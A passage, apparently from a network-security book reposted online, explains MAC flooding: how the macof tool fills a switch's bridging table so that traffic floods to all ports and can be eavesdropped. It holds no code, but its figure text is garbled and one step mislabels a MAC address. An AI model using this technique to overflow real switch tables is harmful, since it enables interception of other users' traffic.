Forcing an Excessive Flooding Condition

If a switch does not have an entry pointing to a destination MAC address, it floods the frame. What happens when a switch does not have room to store a new MAC address? And what happens if an entry that was there 2 seconds ago was just overwritten by another entry? These questions are probably what Ian Vitek must have asked himself back in 1999 when he wrote a little tool called macof (later ported to C by Dug Song).2 How switches behave when their bridging table is full depends on the vendor.

Most Cisco switches do not overwrite an existing entry in favor of a more recent one; however, after an existing entry ages out, a new one replaces it. Other switches function in a circular-buffer fashion when nearing full bridging-table capacity. This means that a new entry (MAC address Z, for example) simply overwrites an existing older entry (MAC address B, for example). Traffic destined to MAC address B now gets flooded out by all the ports that are members of the sender's VLAN. If a hacker constantly maintains a full bridging table, he can effectively transform the switch into a hub, which makes it easy for anyone off any port to collect all traffic exchanged in the port's VLAN, including one-to-one unicast conversations, as Figures 2-4 and 2-5 show.

Figure 2-4 Existing Entries Are Overwritten

MAC Address

VLAN

Interface

.. B

5

Fa0/2

X

5

Fa0/3

Y

5

MAC B

MAC B

0000.CAFE.0000

X Is on

Y Is on

Port 3

MAC C macof

Figure 2-4 shows a hypothetical LAN switch with room to store two MAC addresses in its bridging table. Although this switch surely fits into the "ridiculously under-engineered piece of equipment" category, it serves our illustration purposes well.

Host C starts running macof. The tool sends Ethernet frames to random destinations, each time modifying the source MAC address. When the first frame with source MAC address Y arrives on port Fa0/3, it overwrites the 00:00:CAFE:00:00 entry. When the second frame arrives (source MAC Y), it overwrites the entry pointing to B. At this point in time, all communication between 00:00:CAFE:00:00 and B now become public because of the flooding condition that macof created. Figure 2-5 illustrates this situation.

Figure 2-5 Forced Flooding

MAC Address X

VLAN 5

Interface Fa0/3

Y

5

Fa0/3

No Entry for B ^ Flood Traffic Destined to B

MAC C macof

If a hacker continues to generate spurious frames using those source addresses (or any other address), he will create a permanent bridge-table full condition that will force the switch to flood all traffic. This is where things get nasty. Switches typically don't build virtualized bridging tables. A given switch can store N thousand MAC addresses total. If a single port off of a single VLAN learns N thousand addresses, flooding occurs for all VLANs! Traffic in VLAN 5 won't magically hop into VLAN 6, but all communication taking place in VLAN 6 will be visible to any eavesdropper connected to any port in VLAN 6.

What Is a Virtualized Bridging Table?

Because almost everything in engineering is a trade-off, manufacturers cannot build switches with extremely high bridging-table capacities while maintaining affordable prices. So, when a switch's bridging table claims it can store up to 32,000 entries, that figure is valid for the entire switch, not on a per-VLAN basis. Therefore, if a single malicious host inside a VLAN manages to completely fill up the table, innocent bystanders in other VLANs are affected. The switch cannot store their source MAC addresses.

Was this article helpful?

0 0

Post a comment